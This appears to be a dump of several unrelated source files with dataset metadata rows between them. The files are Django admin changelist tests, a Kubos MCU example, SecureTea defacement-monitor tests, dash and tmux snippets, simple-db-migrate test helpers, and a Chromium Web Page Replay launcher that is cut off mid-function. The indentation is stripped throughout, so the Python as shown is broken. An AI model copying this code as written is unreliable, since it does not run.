m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page,
m.list_max_show_all, m.list_editable, m)
# Make sure distinct() was called
self.assertEqual(cl.queryset.count(), 1)
def test_distinct_for_non_unique_related_object_in_search_fields(self):
"""
Regressions tests for #15819: If a field listed in search_fields
is a non-unique related object, distinct() must be called.
"""
parent = Parent.objects.create(name='Mary')
Child.objects.create(parent=parent, name='Danielle')
Child.objects.create(parent=parent, name='Daniel')
m = ParentAdmin(Parent, admin.site)
request = self.factory.get('/parent/', data={SEARCH_VAR: 'daniel'})
cl = ChangeList(request, Parent, m.list_display, m.list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page,
m.list_max_show_all, m.list_editable, m)
# Make sure distinct() was called
self.assertEqual(cl.queryset.count(), 1)
def test_distinct_for_many_to_many_at_second_level_in_search_fields(self):
"""
When using a ManyToMany in search_fields at the second level behind a
ForeignKey, distinct() must be called and results shouldn't appear more
than once.
"""
lead = Musician.objects.create(name='Vox')
band = Group.objects.create(name='The Hype')
Concert.objects.create(name='Woodstock', group=band)
Membership.objects.create(group=band, music=lead, role='lead voice')
Membership.objects.create(group=band, music=lead, role='bass player')
m = ConcertAdmin(Concert, admin.site)
request = self.factory.get('/concert/', data={SEARCH_VAR: 'vox'})
cl = ChangeList(request, Concert, m.list_display,
m.list_display_links, m.list_filter, m.date_hierarchy,
m.search_fields, m.list_select_related, m.list_per_page,
m.list_max_show_all, m.list_editable, m)
# There's only one Concert instance
self.assertEqual(cl.queryset.count(), 1)
def test_pagination(self):
"""
Regression tests for #12893: Pagination in admins changelist doesn't
use queryset set by modeladmin.
"""
parent = Parent.objects.create(name='anything')
for i in range(30):
Child.objects.create(name='name %s' % i, parent=parent)
Child.objects.create(name='filtered %s' % i, parent=parent)
request = self.factory.get('/child/')
# Test default queryset
m = ChildAdmin(Child, admin.site)
cl = ChangeList(request, Child, m.list_display, m.list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page, m.list_max_show_all,
m.list_editable, m)
self.assertEqual(cl.queryset.count(), 60)
self.assertEqual(cl.paginator.count, 60)
self.assertEqual(list(cl.paginator.page_range), [1, 2, 3, 4, 5, 6])
# Test custom queryset
m = FilteredChildAdmin(Child, admin.site)
cl = ChangeList(request, Child, m.list_display, m.list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page, m.list_max_show_all,
m.list_editable, m)
self.assertEqual(cl.queryset.count(), 30)
self.assertEqual(cl.paginator.count, 30)
self.assertEqual(list(cl.paginator.page_range), [1, 2, 3])
def test_computed_list_display_localization(self):
"""
Regression test for #13196: output of functions should be localized
in the changelist.
"""
User.objects.create_superuser(
username='super', email='super@localhost', password='secret')
self.client.login(username='super', password='secret')
event = Event.objects.create(date=datetime.date.today())
response = self.client.get(reverse('admin:admin_changelist_event_changelist'))
self.assertContains(response, formats.localize(event.date))
self.assertNotContains(response, six.text_type(event.date))
def test_dynamic_list_display(self):
"""
Regression tests for #14206: dynamic list_display support.
"""
parent = Parent.objects.create(name='parent')
for i in range(10):
Child.objects.create(name='child %s' % i, parent=parent)
user_noparents = self._create_superuser('noparents')
user_parents = self._create_superuser('parents')
# Test with user 'noparents'
m = custom_site._registry[Child]
request = self._mocked_authenticated_request('/child/', user_noparents)
response = m.changelist_view(request)
self.assertNotContains(response, 'Parent object')
list_display = m.get_list_display(request)
list_display_links = m.get_list_display_links(request, list_display)
self.assertEqual(list_display, ['name', 'age'])
self.assertEqual(list_display_links, ['name'])
# Test with user 'parents'
m = DynamicListDisplayChildAdmin(Child, admin.site)
request = self._mocked_authenticated_request('/child/', user_parents)
response = m.changelist_view(request)
self.assertContains(response, 'Parent object')
custom_site.unregister(Child)
list_display = m.get_list_display(request)
list_display_links = m.get_list_display_links(request, list_display)
self.assertEqual(list_display, ('parent', 'name', 'age'))
self.assertEqual(list_display_links, ['parent'])
# Test default implementation
custom_site.register(Child, ChildAdmin)
m = custom_site._registry[Child]
request = self._mocked_authenticated_request('/child/', user_noparents)
response = m.changelist_view(request)
self.assertContains(response, 'Parent object')
def test_show_all(self):
parent = Parent.objects.create(name='anything')
for i in range(30):
Child.objects.create(name='name %s' % i, parent=parent)
Child.objects.create(name='filtered %s' % i, parent=parent)
# Add "show all" parameter to request
request = self.factory.get('/child/', data={ALL_VAR: ''})
# Test valid "show all" request (number of total objects is under max)
m = ChildAdmin(Child, admin.site)
# 200 is the max we'll pass to ChangeList
cl = ChangeList(request, Child, m.list_display, m.list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page, 200, m.list_editable, m)
cl.get_results(request)
self.assertEqual(len(cl.result_list), 60)
# Test invalid "show all" request (number of total objects over max)
# falls back to paginated pages
m = ChildAdmin(Child, admin.site)
# 30 is the max we'll pass to ChangeList for this test
cl = ChangeList(request, Child, m.list_display, m.list_display_links,
m.list_filter, m.date_hierarchy, m.search_fields,
m.list_select_related, m.list_per_page, 30, m.list_editable, m)
cl.get_results(request)
self.assertEqual(len(cl.result_list), 10)
def test_dynamic_list_display_links(self):
"""
Regression tests for #16257: dynamic list_display_links support.
"""
parent = Parent.objects.create(name='parent')
for i in range(1, 10):
Child.objects.create(id=i, name='child %s' % i, parent=parent, age=i)
m = DynamicListDisplayLinksChildAdmin(Child, admin.site)
superuser = self._create_superuser('superuser')
request = self._mocked_authenticated_request('/child/', superuser)
response = m.changelist_view(request)
for i in range(1, 10):
link = reverse('admin:admin_changelist_child_change', args=(i,))
self.assertContains(response, '<a href="%s">%s</a>' % (link, i))
list_display = m.get_list_display(request)
list_display_links = m.get_list_display_links(request, list_display)
self.assertEqual(list_display, ('parent', 'name', 'age'))
self.assertEqual(list_display_links, ['age'])
def test_no_list_display_links(self):
"""#15185 -- Allow no links from the 'change list' view grid."""
p = Parent.objects.create(name='parent')
m = NoListDisplayLinksParentAdmin(Parent, admin.site)
superuser = self._create_superuser('superuser')
request = self._mocked_authenticated_request('/parent/', superuser)
response = m.changelist_view(request)
link = reverse('admin:admin_changelist_parent_change', args=(p.pk,))
self.assertNotContains(response, '<a href="%s">' % link)
def test_tuple_list_display(self):
"""
Regression test for #17128
(ChangeList failing under Python 2.5 after r16319)
"""
swallow = Swallow.objects.create(
origin='Africa', load='12.34', speed='22.2')
model_admin = SwallowAdmin(Swallow, admin.site)
superuser = self._create_superuser('superuser')
request = self._mocked_authenticated_request('/swallow/', superuser)
response = model_admin.changelist_view(request)
# just want to ensure it doesn't blow up during rendering
self.assertContains(response, six.text_type(swallow.origin))
self.assertContains(response, six.text_type(swallow.load))
self.assertContains(response, six.text_type(swallow.speed))
def test_deterministic_order_for_unordered_model(self):
"""
Ensure that the primary key is systematically used in the ordering of
the changelist's results to guarantee a deterministic order, even
when the Model doesn't have any default ordering defined.
Refs #17198.
"""
superuser = self._create_superuser('superuser')
for counter in range(1, 51):
UnorderedObject.objects.create(id=counter, bool=True)
class UnorderedObjectAdmin(admin.ModelAdmin):
list_per_page = 10
def check_results_order(ascending=False):
admin.site.register(UnorderedObject, UnorderedObjectAdmin)
model_admin = UnorderedObjectAdmin(UnorderedObject, admin.site)
counter = 0 if ascending else 51
for page in range(0, 5):
request = self._mocked_authenticated_request('/unorderedobject/?p=%s' % page, superuser)
response = model_admin.changelist_view(request)
for result in response.context_data['cl'].result_list:
counter += 1 if ascending else -1
self.assertEqual(result.id, counter)
admin.site.unregister(UnorderedObject)
# When no order is defined at all, everything is ordered by '-pk'.
check_results_order()
# When an order field is defined but multiple records have the same
# value for that field, make sure everything gets ordered by -pk as well.
UnorderedObjectAdmin.ordering = ['bool']
check_results_order()
# When order fields are defined, including the pk itself, use them.
UnorderedObjectAdmin.ordering = ['bool', '-pk']
check_results_order()
UnorderedObjectAdmin.ordering = ['bool', 'pk']
check_results_order(ascending=True)
UnorderedObjectAdmin.ordering = ['-id', 'bool']
check_results_order()
UnorderedObjectAdmin.ordering = ['id', 'bool']
check_results_order(ascending=True)
def test_deterministic_order_for_model_ordered_by_its_manager(self):
"""
Ensure that the primary key is systematically used in the ordering of
the changelist's results to guarantee a deterministic order, even
when the Model has a manager that defines a default ordering.
Refs #17198.
"""
superuser = self._create_superuser('superuser')
for counter in range(1, 51):
OrderedObject.objects.create(id=counter, bool=True, number=counter)
class OrderedObjectAdmin(admin.ModelAdmin):
list_per_page = 10
def check_results_order(ascending=False):
admin.site.register(OrderedObject, OrderedObjectAdmin)
model_admin = OrderedObjectAdmin(OrderedObject, admin.site)
counter = 0 if ascending else 51
for page in range(0, 5):
request = self._mocked_authenticated_request('/orderedobject/?p=%s' % page, superuser)
response = model_admin.changelist_view(request)
for result in response.context_data['cl'].result_list:
counter += 1 if ascending else -1
self.assertEqual(result.id, counter)
admin.site.unregister(OrderedObject)
# When no order is defined at all, use the model's default ordering (i.e. 'number')
check_results_order(ascending=True)
# When an order field is defined but multiple records have the same
# value for that field, make sure everything gets ordered by -pk as well.
OrderedObjectAdmin.ordering = ['bool']
check_results_order()
# When order fields are defined, including the pk itself, use them.
OrderedObjectAdmin.ordering = ['bool', '-pk']
check_results_order()
OrderedObjectAdmin.ordering = ['bool', 'pk']
check_results_order(ascending=True)
OrderedObjectAdmin.ordering = ['-id', 'bool']
check_results_order()
OrderedObjectAdmin.ordering = ['id', 'bool']
check_results_order(ascending=True)
def test_dynamic_list_filter(self):
"""
Regression tests for ticket #17646: dynamic list_filter support.
"""
parent = Parent.objects.create(name='parent')
for i in range(10):
Child.objects.create(name='child %s' % i, parent=parent)
user_noparents = self._create_superuser('noparents')
user_parents = self._create_superuser('parents')
# Test with user 'noparents'
m = DynamicListFilterChildAdmin(Child, admin.site)
request = self._mocked_authenticated_request('/child/', user_noparents)
response = m.changelist_view(request)
self.assertEqual(response.context_data['cl'].list_filter, ['name', 'age'])
# Test with user 'parents'
m = DynamicListFilterChildAdmin(Child, admin.site)
request = self._mocked_authenticated_request('/child/', user_parents)
response = m.changelist_view(request)
self.assertEqual(response.context_data['cl'].list_filter, ('parent', 'name', 'age'))
def test_dynamic_search_fields(self):
child = self._create_superuser('child')
m = DynamicSearchFieldsChildAdmin(Child, admin.site)
request = self._mocked_authenticated_request('/child/', child)
response = m.changelist_view(request)
self.assertEqual(response.context_data['cl'].search_fields, ('name', 'age'))
def test_pagination_page_range(self):
"""
Regression tests for ticket #15653: ensure the number of pages
generated for changelist views are correct.
"""
# instantiating and setting up ChangeList object
m = GroupAdmin(Group, admin.site)
request = self.factory.get('/group/')
cl = ChangeList(request, Group, m.list_display,
m.list_display_links, m.list_filter, m.date_hierarchy,
m.search_fields, m.list_select_related, m.list_per_page,
m.list_max_show_all, m.list_editable, m)
per_page = cl.list_per_page = 10
for page_num, objects_count, expected_page_range in [
(0, per_page, []),
(0, per_page * 2, list(range(2))),
(5, per_page * 11, list(range(11))),
(5, per_page * 12, [0, 1, 2, 3, 4, 5, 6, 7, 8, '.', 10, 11]),
(6, per_page * 12, [0, 1, '.', 3, 4, 5, 6, 7, 8, 9, 10, 11]),
(6, per_page * 13, [0, 1, '.', 3, 4, 5, 6, 7, 8, 9, '.', 11, 12]),
]:
# assuming we have exactly `objects_count` objects
Group.objects.all().delete()
for i in range(objects_count):
Group.objects.create(name='test band')
# setting page number and calculating page range
cl.page_num = page_num
cl.get_results(request)
real_page_range = pagination(cl)['page_range']
self.assertListEqual(
expected_page_range,
list(real_page_range),
)
class AdminLogNodeTestCase(TestCase):
def test_get_admin_log_templatetag_custom_user(self):
"""
Regression test for ticket #20088: admin log depends on User model
having id field as primary key.
The old implementation raised an AttributeError when trying to use
the id field.
"""
context = Context({'user': CustomIdUser()})
template_string = '{% load log %}{% get_admin_log 10 as admin_log for_user user %}'
template = Template(template_string)
# Rendering should be u'' since this templatetag just logs,
# it doesn't render any string.
self.assertEqual(template.render(context), '')
def test_get_admin_log_templatetag_no_user(self):
"""
The {% get_admin_log %} tag should work without specifying a user.
"""
user = User(username='jondoe', password='secret', email='super@example.com')
user.save()
ct = ContentType.objects.get_for_model(User)
LogEntry.objects.log_action(user.pk, ct.pk, user.pk, repr(user), 1)
t = Template(
'{% load log %}'
'{% get_admin_log 100 as admin_log %}'
'{% for entry in admin_log %}'
'{{ entry|safe }}'
'{% endfor %}'
)
self.assertEqual(t.render(Context({})), 'Added "<User: jondoe>".')
@override_settings(PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
ROOT_URLCONF="admin_changelist.urls")
class SeleniumFirefoxTests(AdminSeleniumWebDriverTestCase):
available_apps = ['admin_changelist'] + AdminSeleniumWebDriverTestCase.available_apps
webdriver_class = 'selenium.webdriver.firefox.webdriver.WebDriver'
def setUp(self):
# password = "secret"
User.objects.create(
pk=100, username='super', first_name='Super', last_name='User', email='super@example.com',
password='sha1$995a3$6011485ea3834267d719b4c801409b8b1ddd0158', is_active=True, is_superuser=True,
is_staff=True, last_login=datetime.datetime(2007, 5, 30, 13, 20, 10),
date_joined=datetime.datetime(2007, 5, 30, 13, 20, 10)
)
def test_add_row_selection(self):
"""
Ensure that the status line for selected rows gets updated correcly (#22038)
"""
self.admin_login(username='super', password='secret')
self.selenium.get('%s%s' % (self.live_server_url,
reverse('admin:auth_user_changelist')))
form_id = '#changelist-form'
# Test amount of rows in the Changelist
rows = self.selenium.find_elements_by_css_selector(
'%s #result_list tbody tr' % form_id)
self.assertEqual(len(rows), 1)
# Test current selection
selection_indicator = self.selenium.find_element_by_css_selector(
'%s .action-counter' % form_id)
self.assertEqual(selection_indicator.text, "0 of 1 selected")
# Select a row and check again
row_selector = self.selenium.find_element_by_css_selector(
'%s #result_list tbody tr:first-child .action-select' % form_id)
row_selector.click()
self.assertEqual(selection_indicator.text, "1 of 1 selected")
class SeleniumChromeTests(SeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.chrome.webdriver.WebDriver'
class SeleniumIETests(SeleniumFirefoxTests):
webdriver_class = 'selenium.webdriver.ie.webdriver.WebDriver'
| 45.8933
| 164
| 0.653339
|
59fc369152eefd23f8d84a524594bcea58fde0b2
| 1,427
|
py
|
Python
|
examples/pumpkin-mcu-api-example/example_mcu_api.py
|
srjustice/kubos
|
ff33c17a7b5335d981cd0a49c65874f9f733338d
|
[
"Apache-2.0"
] | null | null | null |
examples/pumpkin-mcu-api-example/example_mcu_api.py
|
srjustice/kubos
|
ff33c17a7b5335d981cd0a49c65874f9f733338d
|
[
"Apache-2.0"
] | null | null | null |
examples/pumpkin-mcu-api-example/example_mcu_api.py
|
srjustice/kubos
|
ff33c17a7b5335d981cd0a49c65874f9f733338d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# Copyright 2018 Kubos Corporation
# Licensed under the Apache License, Version 2.0
# See LICENSE file for details.
"""
Example usage of the mcu_api
"""
import mcu_api
import time
MODULES = {
"sim": {"address": 80},
"gpsrm": {"address": 81},
"pim": {"address": 83},
"rhm": {"address": 85},
"bm2": {"address": 92}
}
# Sending commands
module = "sim"
address = MODULES[module]['address']
print('\nModule: ' + module)
print('Address: ' + str(address))
mcu = mcu_api.MCU(address=address)
turn_led_on_cmd = "SUP:LED ON"
turn_led_off_cmd = "SUP:LED OFF"
print mcu.write(turn_led_on_cmd)
time.sleep(3)
print mcu.write(turn_led_off_cmd)
# Read a selection of telemetry items
module = "sim"
address = MODULES[module]['address']
fields = ["firmware_version", "commands_parsed", "scpi_errors", "time"]
print('\nModule: ' + module)
print('Address: ' + str(address))
print('Fields: ' + str(fields) + '\n')
mcu = mcu_api.MCU(address=address)
out = mcu.read_telemetry(module=module, fields=fields)
for field in out:
print(field, out[field])
# Read all telemetry from all modules
for module in MODULES:
module = str(module)
address = MODULES[module]['address']
print('\nModule: ' + module)
print('Address: ' + str(address) + '\n')
mcu = mcu_api.MCU(address=address)
out = mcu.read_telemetry(module=module)
for field in out:
print(field, out[field])
| 25.035088
| 71
| 0.670638
|
38f797ead2a7c58c381f6d36e539efcd6a2fc309
| 3,516
|
py
|
Python
|
test/test_monitor.py
|
pwned-17/SecureTea-Project
|
f32fcd5054155567b4511ee69ae1617ed595655a
|
[
"MIT"
] | 257
|
2018-03-28T12:43:20.000Z
|
2022-03-29T07:07:23.000Z
|
test/test_monitor.py
|
pwned-17/SecureTea-Project
|
f32fcd5054155567b4511ee69ae1617ed595655a
|
[
"MIT"
] | 155
|
2018-03-31T14:57:46.000Z
|
2022-03-17T18:12:41.000Z
|
test/test_monitor.py
|
pwned-17/SecureTea-Project
|
f32fcd5054155567b4511ee69ae1617ed595655a
|
[
"MIT"
] | 132
|
2018-03-27T06:25:20.000Z
|
2022-03-28T11:32:45.000Z
|
# -*- coding: utf-8 -*-
import unittest
from securetea.lib.web_deface.monitor import Monitor
from securetea.lib.web_deface.deface_logger import DefaceLogger
from securetea.lib.web_deface.gather_file import GatherFile
from securetea.lib.web_deface.hash_gen import Hash
from securetea.lib.web_deface.defacement_detector import DefaceDetect
try:
# if python 3.x.x
from unittest.mock import patch
except ImportError: # python 2.x.x
from mock import patch
class TestDefaceMonitor(unittest.TestCase):
"""
Test class for SecureTea Web Deface Monitor.
"""
@patch("securetea.lib.web_deface.monitor.json_to_dict")
@patch("securetea.lib.web_deface.monitor.shutil.copy")
def test_copy_file(self, mck_shutil_copy, mck_json_to_dict):
"""
Test copy_file.
"""
mck_json_to_dict.return_value = "random"
# Create Monitor object
self.monitor_obj = Monitor()
# Back-up dict
self.monitor_obj.back_up_dict = {"orig_path": "backup_path"}
self.monitor_obj.copy_file("orig_path")
mck_shutil_copy.assert_called_with("backup_path", "orig_path")
@patch.object(Monitor, "copy_file")
@patch.object(DefaceLogger, "log")
@patch.object(Hash, "hash_value")
@patch.object(Hash, "get_sets")
@patch.object(GatherFile, "scan_dir")
@patch("securetea.lib.web_deface.monitor.json_to_dict")
def test_monitor(self, mck_json_to_dict, mck_gthr, mck_hash, mck_set, mck_log, mck_copy):
"""
Test monitor.
"""
# Mock neccessary
mck_json_to_dict.return_value = "random"
mck_gthr.return_value = ["random_path"]
mck_copy.return_value = True
# Case 1: File modification
mck_hash.return_value = {"random_path": "random_hash"}
mck_set.return_value = {"random_path": "random_hash"}
# Create monitor object
self.monitor_obj = Monitor()
self.monitor_obj.cache_hash = {
"random_path": "random_hash_new"
}
self.monitor_obj.cache_set = {
"random_path": "random_hash_new"
}
self.monitor_obj.monitor()
mck_log.assert_called_with('Web Deface detected, attempt to modify file: random_path',
logtype='warning')
# Case 2: File addition
mck_hash.return_value = {"random_path": "random_hash",
"random_path_new": "random_hash_new"}
mck_set.return_value = {"random_path": "random_hash",
"random_path_new": "random_hash_new"}
self.monitor_obj.cache_hash = {
"random_path_new": "random_hash_new"
}
self.monitor_obj.cache_set = {
"random_path_new": "random_hash_new"
}
self.monitor_obj.monitor()
mck_log.assert_called_with('Web Deface detected, attempt to add new file: random_path',
logtype='warning')
# Case 3: File deletion
mck_hash.return_value = {"random_path": "random_hash"}
mck_set.return_value = {"random_path": "random_hash"}
self.monitor_obj.cache_hash = {
"random_path_new": "random_hash_new"
}
self.monitor_obj.monitor()
mck_log.assert_called_with('Web Deface detected, attempt to delete file: random_path_new',
logtype='warning')
| 39.066667
| 99
| 0.620592
|
48d2217fd30ee0981feb51463e6beaf06d1bac1c
| 706
|
py
|
Python
|
docs/components_page/components/layout/breakpoints.py
|
imrehg/dash-bootstrap-components
|
7cf43168808bb88b243e414168dc3bf196fefd84
|
[
"Apache-2.0"
] | 1
|
2021-05-08T08:21:41.000Z
|
2021-05-08T08:21:41.000Z
|
docs/components_page/components/layout/breakpoints.py
|
imrehg/dash-bootstrap-components
|
7cf43168808bb88b243e414168dc3bf196fefd84
|
[
"Apache-2.0"
] | null | null | null |
docs/components_page/components/layout/breakpoints.py
|
imrehg/dash-bootstrap-components
|
7cf43168808bb88b243e414168dc3bf196fefd84
|
[
"Apache-2.0"
] | null | null | null |
import dash_bootstrap_components as dbc
import dash_html_components as html
row = html.Div(
[
dbc.Row(
[
dbc.Col(html.Div("One of three columns"), md=4),
dbc.Col(html.Div("One of three columns"), md=4),
dbc.Col(html.Div("One of three columns"), md=4),
]
),
dbc.Row(
[
dbc.Col(html.Div("One of four columns"), width=6, lg=3),
dbc.Col(html.Div("One of four columns"), width=6, lg=3),
dbc.Col(html.Div("One of four columns"), width=6, lg=3),
dbc.Col(html.Div("One of four columns"), width=6, lg=3),
]
),
]
)
| 30.695652
| 72
| 0.483003
|
0b9fdcdbe7bca44a103fa9a2c3b6e7ec22a3f2cf
| 2,083
|
py
|
Python
|
tests/__init__.py
|
wesrog/simple-db-migrate
|
5d5637cbb96424676571431bb688f8b977b0837d
|
[
"Apache-2.0"
] | 1
|
2017-12-14T22:20:30.000Z
|
2017-12-14T22:20:30.000Z
|
tests/__init__.py
|
wesrog/simple-db-migrate
|
5d5637cbb96424676571431bb688f8b977b0837d
|
[
"Apache-2.0"
] | null | null | null |
tests/__init__.py
|
wesrog/simple-db-migrate
|
5d5637cbb96424676571431bb688f8b977b0837d
|
[
"Apache-2.0"
] | null | null | null |
import glob
import os
import unittest
import codecs
from simple_db_migrate.config import *
def create_file(file_name, content=None, encoding='utf-8'):
f = codecs.open(file_name, 'w', encoding)
if content:
f.write(content)
f.close()
return file_name
def create_migration_file(file_name, sql_up='', sql_down=''):
create_file(file_name, 'SQL_UP=u"%s"\nSQL_DOWN=u"%s"' % (sql_up, sql_down))
return file_name
def delete_files(pattern):
filelist=glob.glob(pattern)
for file in filelist:
os.remove(file)
def create_config(host='localhost', username='root', password='', database='migration_example', migrations_dir='.', utc_timestamp=False, script_encoding='utf-8'):
config_file = '''
DATABASE_HOST = '%s'
DATABASE_USER = '%s'
DATABASE_PASSWORD = '%s'
DATABASE_NAME = '%s'
DATABASE_MIGRATIONS_DIR = '%s'
UTC_TIMESTAMP = %s
DATABASE_SCRIPT_ENCODING = '%s'
''' % (host, username, password, database, migrations_dir, utc_timestamp, script_encoding)
create_file('test_config_file.conf', config_file)
return FileConfig('test_config_file.conf')
class BaseTest(unittest.TestCase):
def tearDown(self):
delete_files('*.log')
delete_files('*test_migration.migration')
delete_files('migrations/*test_migration.migration')
if os.path.exists(os.path.abspath('migrations')):
os.rmdir(os.path.abspath('migrations'))
if os.path.exists(os.path.abspath('test_config_file.conf')):
os.remove(os.path.abspath('test_config_file.conf'))
def assertRaisesWithMessage(self, excClass, excMessage, callableObj, *args, **kwargs):
raisedMessage = ''
try:
callableObj(*args, **kwargs)
except excClass, e:
raisedMessage = str(e)
if excMessage == raisedMessage:
return
if hasattr(excClass,'__name__'): excName = excClass.__name__
else: excName = str(excClass)
raise self.failureException, "%s not raised with message '%s', the message was '%s'" % (excName, excMessage, raisedMessage)
| 35.913793
| 162
| 0.679309
|
335142be0a429e0cfea3109578e96a6e6c744822
| 411
|
py
|
Python
|
prog/tmux/theme/misc_segments/__init__.py
|
mohkale/.dotfiles
|
273cbfba85edda8730954d9dcffb82b858bc9433
|
[
"MIT"
] | null | null | null |
prog/tmux/theme/misc_segments/__init__.py
|
mohkale/.dotfiles
|
273cbfba85edda8730954d9dcffb82b858bc9433
|
[
"MIT"
] | null | null | null |
prog/tmux/theme/misc_segments/__init__.py
|
mohkale/.dotfiles
|
273cbfba85edda8730954d9dcffb82b858bc9433
|
[
"MIT"
] | null | null | null |
"""Miscellaneous segments for my tmux status-line."""
from .base import StatusMiscSegment
from .mpd import MPDSegment
from .github import GithubNotificationsSegment
from .nordvpn import NordVPNSegment
from .mullvad_vpn import MullvadVPNSegment
from .notmuch import NotMuchSegment
from .transmission import TransmissionNotificationSegment
from .battery_life import BatteryLifeSegment
| 34.25
| 57
| 0.800487
|
595cff82d3e8d43b15dc25f35e2ff0ece82a1f99
| 9,035
|
py
|
Python
|
tools/python/google/webpagereplay_utils.py
|
robclark/chromium
|
f097b6ea775c27e5352c94ddddd264dd2af21479
|
[
"BSD-3-Clause"
] | 1
|
2019-07-22T23:03:26.000Z
|
2019-07-22T23:03:26.000Z
|
tools/python/google/webpagereplay_utils.py
|
robclark/chromium
|
f097b6ea775c27e5352c94ddddd264dd2af21479
|
[
"BSD-3-Clause"
] | null | null | null |
tools/python/google/webpagereplay_utils.py
|
robclark/chromium
|
f097b6ea775c27e5352c94ddddd264dd2af21479
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""A class to help start/stop a Web Page Replay Server.
The page cycler tests use this module to run Web Page Replay
(see tools/build/scripts/slave/runtest.py).
If run from the command-line, the module will launch Web Page Replay
and the specified test:
./webpagereplay_utils.py --help # list options
./webpagereplay_utils.py 2012Q2 # run a WPR-enabled test
"""
import logging
import optparse
import os
import shutil
import signal
import subprocess
import sys
import tempfile
import time
import urllib
USAGE = '%s [options] CHROME_EXE TEST_NAME' % os.path.basename(sys.argv[0])
USER_DATA_DIR = '{TEMP}/webpagereplay_utils-chrome'
# The port numbers must match those in chrome/test/perf/page_cycler_test.cc.
HTTP_PORT = 8080
HTTPS_PORT = 8413
class ReplayError(Exception):
"""Catch-all exception for the module."""
pass
class ReplayNotFoundError(Exception):
pass
class ReplayNotStartedError(Exception):
pass
class ReplayLauncher(object):
LOG_FILE = 'log.txt'
def __init__(self, replay_dir, archive_path, log_dir, replay_options=None):
"""Initialize ReplayLauncher.
Args:
replay_dir: directory that has replay.py and related modules.
archive_path: either a directory that contains WPR archives or,
a path to a specific WPR archive.
log_dir: where to write log.txt.
replay_options: a list of options strings to forward to replay.py.
"""
self.replay_dir = replay_dir
self.archive_path = archive_path
self.log_dir = log_dir
self.replay_options = replay_options if replay_options else []
self.log_name = os.path.join(self.log_dir, self.LOG_FILE)
self.log_fh = None
self.proxy_process = None
self.wpr_py = os.path.join(self.replay_dir, 'replay.py')
if not os.path.exists(self.wpr_py):
raise ReplayNotFoundError('Path does not exist: %s' % self.wpr_py)
self.wpr_options = [
'--port', str(HTTP_PORT),
'--ssl_port', str(HTTPS_PORT),
'--use_closest_match',
# TODO(slamm): Add traffic shaping (requires root):
# '--net', 'fios',
]
self.wpr_options.extend(self.replay_options)
def _OpenLogFile(self):
if not os.path.exists(self.log_dir):
os.makedirs(self.log_dir)
return open(self.log_name, 'w')
def StartServer(self):
cmd_line = [self.wpr_py]
cmd_line.extend(self.wpr_options)
# TODO(slamm): Support choosing archive on-the-fly.
cmd_line.append(self.archive_path)
self.log_fh = self._OpenLogFile()
logging.debug('Starting Web-Page-Replay: %s', cmd_line)
self.proxy_process = subprocess.Popen(
cmd_line, stdout=self.log_fh, stderr=subprocess.STDOUT)
if not self.IsStarted():
raise ReplayNotStartedError(
'Web Page Replay failed to start. See the log file: ' + self.log_name)
def IsStarted(self):
"""Checks to see if the server is up and running."""
for _ in range(5):
if self.proxy_process.poll() is not None:
# The process has exited.
break
try:
up_url = '%s://localhost:%s/web-page-replay-generate-200'
http_up_url = up_url % ('http', HTTP_PORT)
https_up_url = up_url % ('https', HTTPS_PORT)
if (200 == urllib.urlopen(http_up_url, None, {}).getcode() and
200 == urllib.urlopen(https_up_url, None, {}).getcode()):
return True
except IOError:
time.sleep(1)
return False
def StopServer(self):
if self.proxy_process:
logging.debug('Stopping Web-Page-Replay')
# Use a SIGINT here so that it can do graceful cleanup.
# Otherwise, we will leave subprocesses hanging.
self.proxy_process.send_signal(signal.SIGINT)
self.proxy_process.wait()
if self.log_fh:
self.log_fh.close()
class ChromiumPaths(object):
"""Collect all the path handling together."""
PATHS = {
'archives': 'src/data/page_cycler/webpagereplay',
'.wpr': 'src/data/page_cycler/webpagereplay/{TEST_NAME}.wpr',
'.wpr_alt': 'src/tools/page_cycler/webpagereplay/tests/{TEST_NAME}.wpr',
'start.html': 'src/tools/page_cycler/webpagereplay/start.html',
'extension': 'src/tools/page_cycler/webpagereplay/extension',
'replay': 'src/third_party/webpagereplay',
'logs': 'src/webpagereplay_logs/{TEST_EXE_NAME}',
}
def __init__(self, **replacements):
"""Initialize ChromiumPaths.
Args:
replacements: a dict of format replacements for PATHS such as
{'TEST_NAME': '2012Q2', 'TEST_EXE_NAME': 'performance_ui_tests'}.
"""
module_dir = os.path.dirname(__file__)
self.base_dir = os.path.abspath(os.path.join(
module_dir, '..', '..', '..', '..'))
self.replacements = replacements
def __getitem__(self, key):
path_parts = [x.format(**self.replacements)
for x in self.PATHS[key].split('/')]
return os.path.join(self.base_dir, *path_parts)
def LaunchChromium(chrome_exe, chromium_paths, test_name,
is_dns_forwarded, use_auto):
"""Launch chromium to run WPR-backed page cycler tests.
These options need to be kept in sync with
src/chrome/test/perf/page_cycler_test.cc.
"""
REPLAY_HOST='127.0.0.1'
user_data_dir = USER_DATA_DIR.format(**{'TEMP': tempfile.gettempdir()})
chromium_args = [
chrome_exe,
'--load-extension=%s' % chromium_paths['extension'],
'--testing-fixed-http-port=%s' % HTTP_PORT,
'--testing-fixed-https-port=%s' % HTTPS_PORT,
'--disable-background-networking',
'--enable-experimental-extension-apis',
'--enable-file-cookies',
'--enable-logging',
'--log-level=0',
'--enable-stats-table',
'--enable-benchmarking',
'--ignore-certificate-errors',
'--metrics-recording-only',
'--activate-on-launch',
'--no-first-run',
'--no-proxy-server',
'--user-data-dir=%s' % user_data_dir,
'--window-size=1280,1024',
]
if not is_dns_forwarded:
chromium_args.append('--host-resolver-rules=MAP * %s' % REPLAY_HOST)
start_url = 'file://%s?test=%s' % (chromium_paths['start.html'], test_name)
if use_auto:
start_url += '&auto=1'
chromium_args.append(start_url)
if os.path.exists(user_data_dir):
shutil.rmtree(user_data_dir)
os.makedirs(user_data_dir)
try:
logging.debug('Starting Chrome: %s', chromium_args)
